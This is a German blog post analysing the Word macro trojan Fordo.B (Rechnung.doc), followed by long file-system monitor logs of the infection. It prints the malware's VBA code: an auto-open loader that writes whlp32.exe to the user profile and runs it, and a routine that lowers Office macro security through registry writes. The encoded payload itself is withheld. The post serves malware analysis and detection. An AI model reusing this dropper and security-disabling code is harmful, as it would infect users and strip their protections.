Fordo.B: Der Trojaner kommt im Word-Dokument Rechnung.doc
Gerade frisch auf den Tisch kam mir der Trojaner Fordo.B am gestrigen Tag: Das Teil scheint noch sehr neu zu sein. Am 09.09. erkannte es weder Avira, noch GData, noch ESafe. Da ich im Internet noch keine technischen Informationen zu diesem Schädling gefunden habe, habe ich Protokolle zusammengetragen, die die Zugriffe auf das Dateisystem und die Windows-Registry dokumentieren.
Trojaner-Aufbau
Der Trojaner ist eine Worddatei (Rechnung.doc, ggf. auch abweichende Dateinamen), die ein Visual-Basic-Skript enthält, das beim Öffnen der Datei ausgeführt wird. Ist die Makro-Sicherheit in Word entsprechend konfiguriert, kommt der VBA-Code nicht zur Ausführung.
Das VBA-Skript beinhaltet eine codierte Exe-Datei, die der Trojaner auf die Festplatte überträgt. Der VBA-Code sieht so aus:
Private Sub MyMessage()
End Sub
Private Sub Loader()
Dim dumpfile As String: Dim exefile As String
Dim i As Long
Call Shellcode
For i = 1 To iBlockCount
dumpfile = dumpfile & b(i)
Next i
Dim parsearr() As String: parsearr = Split(dumpfile, "|", -1, vbTextCompare)
For i = 0 To iSymbols - 1
exefile = exefile & Chr(parsearr(i))
Next i
Dim NameOfLocalFile As String: Dim PathOfWriteDir As String: Dim DatNr As Integer
NameOfLocalFile = "whlp32.exe"
PathOfWriteDir = Environ("USERPROFILE")
ChDrive (PathOfWriteDir): ChDir (PathOfWriteDir): DatNr = FreeFile(): Open NameOfLocalFile For Binary Access Read Write As DatNr
Put #1, , exefile
Close #1
Shell (NameOfLocalFile)
Call DisableSecurity
Call MyMessage
End Sub
Private Sub Document_Open()
Call Loader
End Sub
Private Sub DisableSecurity()
Dim objShell: Set objShell = CreateObject("WScript.Shell"): On Error Resume Next
objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security\Level", 1, "REG_DWORD"
objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Excel\Security\Level", 1, "REG_DWORD"
objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\Level", 1, "REG_DWORD"
objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\Level", 1, "REG_DWORD"
objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
End Sub
Die Methode Shellcode() enthält die codierte EXE-Datei aus Array of String. (Verständlicherweise poste ich diesen Teil hier nicht 
)
Die Methode DisableSecurity() verändert die Office-Sicherheitseinstellungen. Das Skript ist dabei abwärtskompatibel bis Office 2000 zu sein (Version 9).
Was passiert nach dem Öffnen der Worddatei?
Um das zu ermitteln, habe ich die Tools Filemon und Regmon während des Dokumentöffnens im Hintergrund laufen gelassen. Das Protokoll sieht (der Optik wegen verkürzt) so aus:
svchost.exe:760 CREATE C:\WINDOWS\Prefetch\WINWORD.EXE-0B995611.pf
svchost.exe:760 OPEN C:\WINDOWS\Prefetch\SUCCESS Options: Open Directory
winlogon.exe:448 DIRECTORY C:\WINDOWS Change Notify
svchost.exe:760 OPEN C:\WINDOWS\Prefetch\ SUCCESS Options: Open Directory
winlogon.exe:448 DIRECTORY C:\WINDOWS Change Notify
svchost.exe:760 WRITE C:\WINDOWS\Prefetch\WINWORD.EXE-0B995611.pf SUCCESS Offset: 0 Length: 97534
svchost.exe:760 CLOSE C:\WINDOWS\Prefetch\WINWORD.EXE-0B995611.pf SUCCESS
WINWORD.EXE:3936 OPEN C:\Temp SUCCESS Options: Open Directory Access: Traverse
WINWORD.EXE:3936 CLOSE C:\Temp SUCCESS
WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator SUCCESS Options: Open Directory Access: Traverse
WINWORD.EXE:3936 CLOSE C:\Temp SUCCESS
WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator SUCCESS Options: Open Directory Access: Traverse
WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator SUCCESS
WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Options: OpenIf Access: All
WINWORD.EXE:3936 WRITE C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Offset: 0 Length: 45297
WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS
WINWORD.EXE:3936 QUERY INFORMATION C:\Programme\Microsoft Office\Office12\whlp32.exe FILE NOT FOUND Attributes: Error
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Options: Open Access: All
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Length: 45297
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Length: 45297
WINWORD.EXE:3936 QUERY INFORMATION C:\WINDOWS\system32\Apphelp.dll SUCCESS Attributes: A
WINWORD.EXE:3936 OPEN C:\WINDOWS\system32\Apphelp.dll SUCCESS Options: Open Access: Execute
WINWORD.EXE:3936 QUERY INFORMATION C:\WINDOWS\system32\Apphelp.dll SUCCESS Length: 126976
WINWORD.EXE:3936 CLOSE C:\WINDOWS\system32\Apphelp.dll SUCCESS
WINWORD.EXE:3936 QUERY INFORMATION C:\WINDOWS\system32\Apphelp.dll SUCCESS Attributes: A
WINWORD.EXE:3936 OPEN C:\WINDOWS\system32\Apphelp.dll SUCCESS Options: Open Access: Execute
WINWORD.EXE:3936 CLOSE C:\WINDOWS\system32\Apphelp.dll SUCCESS
WINWORD.EXE:3936 OPEN C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS Options: Open Access: All
WINWORD.EXE:3936 QUERY INFORMATION C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS Length: 1190796
WINWORD.EXE:3936 QUERY INFORMATION C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS Length: 1190796
WINWORD.EXE:3936 QUERY INFORMATION C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS Length: 1190796
WINWORD.EXE:3936 OPEN C:\WINDOWS\AppPatch\systest.sdb FILE NOT FOUND Options: Open Access: All
WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\ SUCCESS Options: Open Directory Access: All
WINWORD.EXE:3936 DIRECTORY C:\Dokumente und Einstellungen\Administrator\ SUCCESS FileBothDirectoryInformation: whlp32.exe
WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\ SUCCESS
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\ SUCCESS Options: Open Directory Access: All
WINWORD.EXE:3936 DIRECTORY C:\Dokumente und Einstellungen\Administrator\ SUCCESS FileBothDirectoryInformation: whlp32.exe
WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\ SUCCESS
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\ SUCCESS Options: Open Directory Access: All
WINWORD.EXE:3936 DIRECTORY C:\Dokumente und Einstellungen\Administrator\ SUCCESS FileBothDirectoryInformation: whlp32.exe
WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\ SUCCESS
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\AdministratorSUCCESS Attributes: A
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Length: 45297
WINWORD.EXE:3936 CLOSE C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS FileNameInformation
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\ SUCCESS Options: Open Directory Access: All
WINWORD.EXE:3936 DIRECTORY C:\Dokumente und Einstellungen\Administrator\ SUCCESS FileBothDirectoryInformation: whlp32.exe
WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\ SUCCESS
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Length: 45297
WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Length: 45297
WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\whlp32.exe.Manifest FILE NOT FOUND Options: Open Access: All
WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS
whlp32.exe:3984 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS FileNameInformation
whlp32.exe:3984 OPEN C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Length: 4726
whlp32.exe:3984 READ C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Offset: 0 Length: 4726
whlp32.exe:3984 OPEN C: SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C: SUCCESS FileFsVolumeInformation
whlp32.exe:3984 OPEN C:\ SUCCESS Options: Open Directory Access: All
whlp32.exe:3984 DIRECTORY C:\ SUCCESS FileNamesInformation
csrss.exe:424 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe BUFFER OVERFLOW FileNameInformation
csrss.exe:424 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS FileNameInformation
whlp32.exe:3984 DIRECTORY C:\ NO MORE FILES FileNamesInformation
whlp32.exe:3984 OPEN C:\DOKUMENTE UND EINSTELLUNGEN\ SUCCESS Options: Open Directory Access: All
whlp32.exe:3984 DIRECTORY C:\DOKUMENTE UND EINSTELLUNGEN\ SUCCESS FileNamesInformation
whlp32.exe:3984 DIRECTORY C:\DOKUMENTE UND EINSTELLUNGEN\ NO MORE FILES FileNamesInformation
whlp32.exe:3984 OPEN C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\ SUCCESS Options: Open Directory Access: All
whlp32.exe:3984 DIRECTORY C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\ SUCCESS FileNamesInformation
whlp32.exe:3984 DIRECTORY C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\ NO MORE FILES FileNamesInformation
whlp32.exe:3984 OPEN C:\WINDOWS\ SUCCESS Options: Open Directory Access: All
whlp32.exe:3984 DIRECTORY C:\WINDOWS\ SUCCESS FileNamesInformation
whlp32.exe:3984 DIRECTORY C:\WINDOWS\ NO MORE FILES FileNamesInformation
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\ SUCCESS Options: Open Directory Access: All
whlp32.exe:3984 DIRECTORY C:\WINDOWS\SYSTEM32\ SUCCESS FileNamesInformation
whlp32.exe:3984 DIRECTORY C:\WINDOWS\SYSTEM32\ SUCCESS FileNamesInformation
whlp32.exe:3984 DIRECTORY C:\WINDOWS\SYSTEM32\ SUCCESS FileNamesInformation
whlp32.exe:3984 DIRECTORY C:\WINDOWS\SYSTEM32\ SUCCESS FileNamesInformation
4037 07:25:29 whlp32.exe:3984 DIRECTORY C:\WINDOWS\SYSTEM32\ SUCCESS FileNamesInformation
whlp32.exe:3984 DIRECTORY C:\WINDOWS\SYSTEM32\ NO MORE FILES FileNamesInformation
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\NTDLL.DLL SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\NTDLL.DLL SUCCESS Length: 733696
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\KERNEL32.DLL SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\KERNEL32.DLL SUCCESS Length: 1057280
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\UNICODE.NLS SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\UNICODE.NLS SUCCESS Length: 89588
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\LOCALE.NLS SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\LOCALE.NLS SUCCESS Length: 249270
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\SORTTBLS.NLS SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\SORTTBLS.NLS SUCCESS Length: 22040
whlp32.exe:3984 OPEN C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Length: 45297
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\USER32.DLL SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\USER32.DLL SUCCESS Length: 578560
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\GDI32.DLL SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\GDI32.DLL SUCCESS Length: 278016
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\IMM32.DLL SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\IMM32.DLL SUCCESS Length: 110080
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\ADVAPI32.DLL SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\ADVAPI32.DLL SUCCESS Length: 677888
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\RPCRT4.DLL SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\RPCRT4.DLL SUCCESS Length: 581120
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\SORTKEY.NLS SUCCESS Options: Open Access: All
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\SORTKEY.NLS SUCCESS Length: 262148
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\NTDLL.DLL SUCCESS Options: Open Access: Execute
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\KERNEL32.DLL SUCCESS Options: Open Access: Execute
whlp32.exe:3984 OPEN C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Options: Open Access: Execute
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\USER32.DLL SUCCESS Options: Open Access: Execute
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\GDI32.DLL SUCCESS Options: Open Access: Execute
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\IMM32.DLL SUCCESS Options: Open Access: Execute
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\ADVAPI32.DLL SUCCESS Options: Open Access: Execute
whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\RPCRT4.DLL SUCCESS Options: Open Access: Execute
whlp32.exe:3984 READ C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Offset: 1024 Length: 40960
whlp32.exe:3984 READ C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Offset: 41984 Length: 2048
whlp32.exe:3984 READ C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Offset: 44032 Length: 1024
whlp32.exe:3984 OPEN C:\Dokumente und Einstellungen\Administrator\ SUCCESS Options: Open Directory Access: Traverse
whlp32.exe:3984 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe.Local FILE NOT FOUND Attributes: Error
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Attributes: A
whlp32.exe:3984 OPEN C:\WINDOWS\system32\IMM32.DLL SUCCESS Options: Open Access: Execute
whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Length: 110080
4079 07:25:30 whlp32.exe:3984 CLOSE C:\WINDOWS\system32\IMM32.DLL SUCCESS
4080 07:25:30 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Attributes: A
4081 07:25:30 whlp32.exe:3984 OPEN C:\WINDOWS\system32\IMM32.DLL SUCCESS Options: Open Access: Execute
4082 07:25:30 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Length: 110080
4083 07:25:30 whlp32.exe:3984 CLOSE C:\WINDOWS\system32\IMM32.DLL SUCCESS
4084 07:25:30 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Attributes: A
4085 07:25:30 whlp32.exe:3984 OPEN C:\WINDOWS\system32\IMM32.DLL SUCCESS Options: Open Access: Execute
4086 07:25:30 whlp32.exe:3984 CLOSE C:\WINDOWS\system32\IMM32.DLL SUCCESS
4087 07:25:30 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Attributes: A
4088 07:25:30 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Attributes: A
4089 07:25:30 whlp32.exe:3984 OPEN C:\Dokumente und Einstellungen\Administrator\$$$$ FILE NOT FOUND Options: Open Access: All
4094 07:25:30 whlp32.exe:3984 READ C:\WINDOWS\system32\kernel32.dll SUCCESS Offset: 377856 Length: 4096
4095 07:25:30 whlp32.exe:3984 OPEN C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Options: Open Access: All
4096 07:25:30 whlp32.exe:3984 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS FileAttributeTagInformation
4097 07:25:30 whlp32.exe:3984 SET INFORMATION C:\WINDOWS\system32\config\system.LOG SUCCESS Length: 8192
4098 07:25:30 whlp32.exe:3984 SET INFORMATION C:\WINDOWS\system32\config\system.LOG SUCCESS Length: 8192
4099 07:25:30 whlp32.exe:3984 SET INFORMATION C:\WINDOWS\system32\config\system.LOG SUCCESS Length: 16384
4100 07:25:30 whlp32.exe:3984 SET INFORMATION C:\WINDOWS\system32\config\system.LOG SUCCESS Length: 20480
4101 07:25:30 whlp32.exe:3984 CLOSE C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS
4180 07:25:30 svchost.exe:760 OPEN C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Options: Open Access: All
4181 07:25:30 svchost.exe:760 QUERY INFORMATION C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Length: 4726
4182 07:25:30 svchost.exe:760 QUERY INFORMATION C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Length: 4726
4183 07:25:30 svchost.exe:760 CLOSE C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS
4184 07:25:30 svchost.exe:760 QUERY INFORMATION C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Attributes: A
4185 07:25:30 svchost.exe:760 OPEN C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Options: Open Access: All
4186 07:25:30 svchost.exe:760 QUERY INFORMATION C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS FileInternalInformation
4187 07:25:30 svchost.exe:760 CLOSE C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS
4247 07:25:30 svchost.exe:760 CREATE C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Options: OverwriteIf Access: All
4248 07:25:30 svchost.exe:760 OPEN C:\WINDOWS\Prefetch\ SUCCESS Options: Open Directory Access: 00000000
4249 07:25:30 svchost.exe:760 WRITE C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Offset: 0 Length: 4798
4250 07:25:30 svchost.exe:760 CLOSE C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS
svchost.exe:760 WRITE C:\WINDOWS\Prefetch\WINWORD.EXE-0B995611.pf SUCCESS Offset: 0 Length: 97534
3960 07:25:27 svchost.exe:760 CLOSE C:\WINDOWS\Prefetch\WINWORD.EXE-0B995611.pf SUCCESS
3961 07:25:27 WINWORD.EXE:3936 OPEN C:\Temp SUCCESS Options: Open Directory Access: Traverse
3962 07:25:27 WINWORD.EXE:3936 CLOSE C:\Temp SUCCESS
3963 07:25:27 WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator SUCCESS Options: Open Directory Access: Traverse
3964 07:25:27 WINWORD.EXE:3936 CLOSE C:\Temp SUCCESS
3965 07:25:27 WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator SUCCESS Options: Open Directory Access: Traverse
3966 07:25:27 WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator SUCCESS
3967 07:25:27 WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Options: OpenIf Access: All
3968 07:25:27 WINWORD.EXE:3936 WRITE C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Offset: 0 Length: 45297
3969 07:25:27 WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS
3970 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\Programme\Microsoft Office\Office12\whlp32.exe FILE NOT FOUND Attributes: Error
3971 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
3972 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
3973 07:25:28 WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Options: Open Access: All
3974 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Length: 45297
3975 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
3976 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Length: 45297
3977 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\WINDOWS\system32\Apphelp.dll SUCCESS Attributes: A
3978 07:25:28 WINWORD.EXE:3936 OPEN C:\WINDOWS\system32\Apphelp.dll SUCCESS Options: Open Access: Execute
3979 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\WINDOWS\system32\Apphelp.dll SUCCESS Length: 126976
3980 07:25:28 WINWORD.EXE:3936 CLOSE C:\WINDOWS\system32\Apphelp.dll SUCCESS
3981 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\WINDOWS\system32\Apphelp.dll SUCCESS Attributes: A
3982 07:25:28 WINWORD.EXE:3936 OPEN C:\WINDOWS\system32\Apphelp.dll SUCCESS Options: Open Access: Execute
3983 07:25:28 WINWORD.EXE:3936 CLOSE C:\WINDOWS\system32\Apphelp.dll SUCCESS
3984 07:25:28 WINWORD.EXE:3936 OPEN C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS Options: Open Access: All
3985 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS Length: 1190796
3986 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS Length: 1190796
3987 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS Length: 1190796
3988 07:25:28 WINWORD.EXE:3936 OPEN C:\WINDOWS\AppPatch\systest.sdb FILE NOT FOUND Options: Open Access: All
3989 07:25:28 WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\ SUCCESS Options: Open Directory Access: All
3990 07:25:28 WINWORD.EXE:3936 DIRECTORY C:\Dokumente und Einstellungen\Administrator\ SUCCESS FileBothDirectoryInformation: whlp32.exe
3991 07:25:28 WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\ SUCCESS
3992 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
3993 07:25:28 WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\ SUCCESS Options: Open Directory Access: All
3994 07:25:28 WINWORD.EXE:3936 DIRECTORY C:\Dokumente und Einstellungen\Administrator\ SUCCESS FileBothDirectoryInformation: whlp32.exe
3995 07:25:28 WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\ SUCCESS
3996 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
3997 07:25:28 WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\ SUCCESS Options: Open Directory Access: All
3998 07:25:28 WINWORD.EXE:3936 DIRECTORY C:\Dokumente und Einstellungen\Administrator\ SUCCESS FileBothDirectoryInformation: whlp32.exe
3999 07:25:28 WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\ SUCCESS
4000 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
4001 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Length: 45297
4002 07:25:28 WINWORD.EXE:3936 CLOSE C:\WINDOWS\AppPatch\sysmain.sdb SUCCESS
4003 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS FileNameInformation
4004 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Attributes: A
4005 07:25:28 WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\ SUCCESS Options: Open Directory Access: All
4006 07:25:28 WINWORD.EXE:3936 DIRECTORY C:\Dokumente und Einstellungen\Administrator\ SUCCESS FileBothDirectoryInformation: whlp32.exe
4007 07:25:28 WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\ SUCCESS
4008 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Length: 45297
4009 07:25:28 WINWORD.EXE:3936 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Length: 45297
4010 07:25:28 WINWORD.EXE:3936 OPEN C:\Dokumente und Einstellungen\Administrator\whlp32.exe.Manifest FILE NOT FOUND Options: Open Access: All
4011 07:25:28 WINWORD.EXE:3936 CLOSE C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS
4012 07:25:29 whlp32.exe:3984 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS FileNameInformation
4013 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Options: Open Access: All
4014 07:25:29 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Length: 4726
4015 07:25:29 whlp32.exe:3984 READ C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Offset: 0 Length: 4726
4016 07:25:29 whlp32.exe:3984 OPEN C: SUCCESS Options: Open Access: All
4017 07:25:29 whlp32.exe:3984 QUERY INFORMATION C: SUCCESS FileFsVolumeInformation
4018 07:25:29 whlp32.exe:3984 OPEN C:\ SUCCESS Options: Open Directory Access: All
4019 07:25:29 whlp32.exe:3984 DIRECTORY C:\ SUCCESS FileNamesInformation
